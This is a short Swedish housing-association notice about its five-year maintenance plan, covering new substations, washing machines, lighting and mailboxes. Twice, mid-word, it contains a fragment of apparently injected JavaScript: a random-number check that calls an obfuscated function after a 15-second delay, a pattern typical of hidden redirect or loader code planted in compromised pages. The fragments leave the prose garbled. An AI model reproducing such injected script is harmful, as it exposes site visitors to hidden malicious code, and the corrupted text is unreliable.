5-årig uppföljningsplan

Föreningen ligger långt framme när det gäller underhållsplanen. Under 2015 har vi bytat ut våra gamla undercentraler, fortlöpandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande även installerat nya tvättmaskiner i de tvättstugor där gamla maskiner har varit och även förnyat belysningen i området.

De kommandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande åren är därför rätt lugna vad gäller underhåll men under 2016 kommer vi att sätta in postlådor i trapporna och även fortsätta med att byta ut belysningen där vi inte gjort det tidigare.